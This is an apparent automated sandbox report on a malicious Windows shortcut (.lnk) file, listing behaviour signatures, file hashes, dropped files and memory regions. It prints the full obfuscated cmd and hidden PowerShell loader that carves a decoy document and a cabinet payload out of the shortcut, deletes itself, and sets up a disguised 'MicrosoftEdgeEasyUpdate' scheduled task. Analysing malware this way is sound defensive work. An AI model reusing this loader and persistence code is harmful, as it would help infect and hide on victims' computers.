Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11/06/2024, 04:49

General

  • Target

    00b6a18a47bdecbf3f97e0a9188e0080a59d87beb4002e8775b036ddee978d37.lnk

  • Size

    33.0MB

  • MD5

    cfffb45df8f05d1cb5d9d95fd5a83e9e

  • SHA1

    4f069b3c3d4ecf90a7f8a3836ac957dfcd90e944

  • SHA256

    00b6a18a47bdecbf3f97e0a9188e0080a59d87beb4002e8775b036ddee978d37

  • SHA512

    5426eb64c10ee748ab2ce0aad3d2b22045c837d6aff3e6da64b9bf9645ea99ca33ab6f7d92de924996eb7879ef65e7bcb607f621bd0483d592a8778e7919a319

  • SSDEEP

    768:vgAPVV/DKgF0JS3EaxNvnIBzHUUYNxHW0onSHzeN6ZC+v1ElH5qwpf2NyDkLmRvN:vtPu35RTnnSHzeNcfSfy6RvN

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself 1 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies registry class 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\00b6a18a47bdecbf3f97e0a9188e0080a59d87beb4002e8775b036ddee978d37.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:740
    • C:\Windows\syswow64\cmd.exe
      "C:\Windows\syswow64\cmd.exe" /q /c Set a4qw7afej=etodrpyswhnli && call %a4qw7afej:~5,1%%a4qw7afej:~2,1%%a4qw7afej:~8,1%%a4qw7afej:~0,1%%a4qw7afej:~4,1%%a4qw7afej:~7,1%%a4qw7afej:~9,1%%a4qw7afej:~0,1%%a4qw7afej:~11,1%%a4qw7afej:~11,1% -%a4qw7afej:~8,1%%a4qw7afej:~12,1%%a4qw7afej:~10,1%%a4qw7afej:~3,1%%a4qw7afej:~2,1%%a4qw7afej:~8,1%%a4qw7afej:~7,1%%a4qw7afej:~1,1%%a4qw7afej:~6,1%%a4qw7afej:~11,1%%a4qw7afej:~0,1% %a4qw7afej:~9,1%%a4qw7afej:~12,1%%a4qw7afej:~3,1%%a4qw7afej:~3,1%%a4qw7afej:~0,1%%a4qw7afej:~10,1% "$NiQttN1 = Get-Location;if($NiQttN1 -Match 'System32' -or $NiQttN1 -Match 'Program Files') {$NiQttN1 = 'C:\Users\Admin\AppData\Local\Temp'};$W7plh7D3zZI=@('.lnk');$urhLT9eZ3Vc = Get-ChildItem -Path $NiQttN1 -Recurse *.* -File | where {$_.extension -in $W7plh7D3zZI} | where-object {$_.length -eq 0x0210CCCC} | Select-Object -ExpandProperty FullName;$aqucL5hpsgw_ = New-Object System.IO.FileStream($urhLT9eZ3Vc, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$aqucL5hpsgw_.Seek(0x00001A0D, [System.IO.SeekOrigin]::Begin);$cqcRL0PBMTfs = New-Object byte[] 0x0000ABF6;$aqucL5hpsgw_.Read($cqcRL0PBMTfs, 0, 0x0000ABF6);$smRWm5tMSPXA = $urhLT9eZ3Vc.replace('.lnk','.hwpx');sc $smRWm5tMSPXA $cqcRL0PBMTfs -Encoding Byte;& $smRWm5tMSPXA;$aqucL5hpsgw_.Seek(0x0000C603, [System.IO.SeekOrigin]::Begin);$pyZmuKvG=New-Object byte[] 0x00000680;$aqucL5hpsgw_.Read($pyZmuKvG, 0, 0x00000680);$aqucL5hpsgw_.Close();Remove-Item -Path $urhLT9eZ3Vc -Force;$xGE_47GiT6=$env:programdata + '\MicrosoftEdge';mkdir $xGE_47GiT6;$oyYsDBuAJ=$xGE_47GiT6 + '\gewcdqa.c' + 'ab';sc $oyYsDBuAJ $pyZmuKvG -Encoding Byte;expand $oyYsDBuAJ -f:* $xGE_47GiT6;$fXoeoYo=$xGE_47GiT6 + '\parkonA.b' + 'at';&$fXoeoYo;Remove-Item -Path $oyYsDBuAJ -Force;"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2480
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -windowstyle hidden "$NiQttN1 = Get-Location;if($NiQttN1 -Match 'System32' -or $NiQttN1 -Match 'Program Files') {$NiQttN1 = 'C:\Users\Admin\AppData\Local\Temp'};$W7plh7D3zZI=@('.lnk');$urhLT9eZ3Vc = Get-ChildItem -Path $NiQttN1 -Recurse *.* -File | where {$_.extension -in $W7plh7D3zZI} | where-object {$_.length -eq 0x0210CCCC} | Select-Object -ExpandProperty FullName;$aqucL5hpsgw_ = New-Object System.IO.FileStream($urhLT9eZ3Vc, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$aqucL5hpsgw_.Seek(0x00001A0D, [System.IO.SeekOrigin]::Begin);$cqcRL0PBMTfs = New-Object byte[] 0x0000ABF6;$aqucL5hpsgw_.Read($cqcRL0PBMTfs, 0, 0x0000ABF6);$smRWm5tMSPXA = $urhLT9eZ3Vc.replace('.lnk','.hwpx');sc $smRWm5tMSPXA $cqcRL0PBMTfs -Encoding Byte;& $smRWm5tMSPXA;$aqucL5hpsgw_.Seek(0x0000C603, [System.IO.SeekOrigin]::Begin);$pyZmuKvG=New-Object byte[] 0x00000680;$aqucL5hpsgw_.Read($pyZmuKvG, 0, 0x00000680);$aqucL5hpsgw_.Close();Remove-Item -Path $urhLT9eZ3Vc -Force;$xGE_47GiT6=$env:programdata + '\MicrosoftEdge';mkdir $xGE_47GiT6;$oyYsDBuAJ=$xGE_47GiT6 + '\gewcdqa.c' + 'ab';sc $oyYsDBuAJ $pyZmuKvG -Encoding Byte;expand $oyYsDBuAJ -f:* $xGE_47GiT6;$fXoeoYo=$xGE_47GiT6 + '\parkonA.b' + 'at';&$fXoeoYo;Remove-Item -Path $oyYsDBuAJ -Force;"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Deletes itself
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3352
        • C:\Windows\SysWOW64\expand.exe
          "C:\Windows\system32\expand.exe" C:\ProgramData\MicrosoftEdge\gewcdqa.cab -f:* C:\ProgramData\MicrosoftEdge
          4⤵
          • Drops file in Windows directory
          PID:3756
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\ProgramData\MicrosoftEdge\parkonA.bat""
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3872
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /create /sc minute /mo 13 /tn "MicrosoftEdgeEasyUpdate" /tr "cmd /q /c \"start \"Microsoft Edge Updater\" /min \"C:\ProgramData\MicrosoftEdge\parkon.bat\" &exit\"" /f
            5⤵
            • Creates scheduled task(s)
            PID:5092
  • C:\Windows\system32\OpenWith.exe
    C:\Windows\system32\OpenWith.exe -Embedding
    1⤵
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    PID:2252

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\ProgramData\MicrosoftEdge\parkon.pko

          Filesize

          1KB

          MD5

          f772107c865925631a56fac02f0c9631

          SHA1

          cdc8ee71f01c59c3362548f751ec2803b745c6bd

          SHA256

          e173955f4c0d266c3a108a95eeca07c88df1810b763b1b254596e40e75177894

          SHA512

          4efc5babb74ed98f78b6a342290c1f7645fc49c247d4eece1c2cbe6fdb25df70ce9ca78ac0929121898e180385f575f92304c3a09a8db1fcb4af43e5a4238235

        • C:\ProgramData\MicrosoftEdge\parkonA.bat

          Filesize

          2KB

          MD5

          a938e5c37311dabc48dc1d14c520b02a

          SHA1

          db9111dbb2eef7fb3482fa014bcea90c9b3df1f5

          SHA256

          fc13917afce9cae08c5aadfa35cf7b210208527e4d0a7f02d24eac82dc96460f

          SHA512

          a9e8e5f93dac1e72985719e6bbd612e90459d71f4a7b0848198346d031c3777ad02f4d13a38ccb05a03a317290dc3538cb3da032e53482d1718ce083d648b09e

        • C:\ProgramData\MicrosoftEdge\parkonB.pko

          Filesize

          5KB

          MD5

          0d550d3c3fcc95dc191a9cb56f8d7fea

          SHA1

          e557278ee060b09fa227a0b9ef144e021763ecd5

          SHA256

          16ccd83a5c3d0e686491e7f7f650a7199d6add01c25fe587bf81b1e43575f564

          SHA512

          219d9f06cab7289935d1fc3476d41218b7910cce9fa9c60eda129d430b7f6d30e58a9619cfd6f93da9b1fde3c7f7d07383ecd174fcf2c98618ac75bbb804ca60

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_r3ziythu.2hi.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • \??\c:\programdata\microsoftedge\gewcdqa.cab

          Filesize

          1KB

          MD5

          bce6d6994700a3e05b4a22e3381a4d36

          SHA1

          6d3b8fd8c18f1daad940d3589890054fe5ff21b1

          SHA256

          623bda38e2790240ae31383db173ded9d295aa484f653ed4f1329174bbaf6154

          SHA512

          3dff495bfdb146ab244faefd7ea5944836bddf03732a2402f82b7d09cc45292a43f3188527c9099e216b50279507bfdadd0689c2bf44237a1cbea9123016558e

        • memory/3352-18-0x0000000005F30000-0x0000000005F4E000-memory.dmp

          Filesize

          120KB

        • memory/3352-22-0x00000000064D0000-0x00000000064F2000-memory.dmp

          Filesize

          136KB

        • memory/3352-7-0x0000000005910000-0x0000000005976000-memory.dmp

          Filesize

          408KB

        • memory/3352-5-0x0000000004FB0000-0x0000000004FD2000-memory.dmp

          Filesize

          136KB

        • memory/3352-17-0x0000000005B50000-0x0000000005EA4000-memory.dmp

          Filesize

          3.3MB

        • memory/3352-0-0x0000000074BFE000-0x0000000074BFF000-memory.dmp

          Filesize

          4KB

        • memory/3352-19-0x0000000005F80000-0x0000000005FCC000-memory.dmp

          Filesize

          304KB

        • memory/3352-20-0x0000000006F30000-0x0000000006FC6000-memory.dmp

          Filesize

          600KB

        • memory/3352-21-0x0000000006480000-0x000000000649A000-memory.dmp

          Filesize

          104KB

        • memory/3352-6-0x00000000058A0000-0x0000000005906000-memory.dmp

          Filesize

          408KB

        • memory/3352-23-0x00000000077D0000-0x0000000007D74000-memory.dmp

          Filesize

          5.6MB

        • memory/3352-24-0x0000000008400000-0x0000000008A7A000-memory.dmp

          Filesize

          6.5MB

        • memory/3352-4-0x0000000074BF0000-0x00000000753A0000-memory.dmp

          Filesize

          7.7MB

        • memory/3352-3-0x0000000074BF0000-0x00000000753A0000-memory.dmp

          Filesize

          7.7MB

        • memory/3352-2-0x0000000005080000-0x00000000056A8000-memory.dmp

          Filesize

          6.2MB

        • memory/3352-1-0x0000000004980000-0x00000000049B6000-memory.dmp

          Filesize

          216KB

        • memory/3352-51-0x0000000074BF0000-0x00000000753A0000-memory.dmp

          Filesize

          7.7MB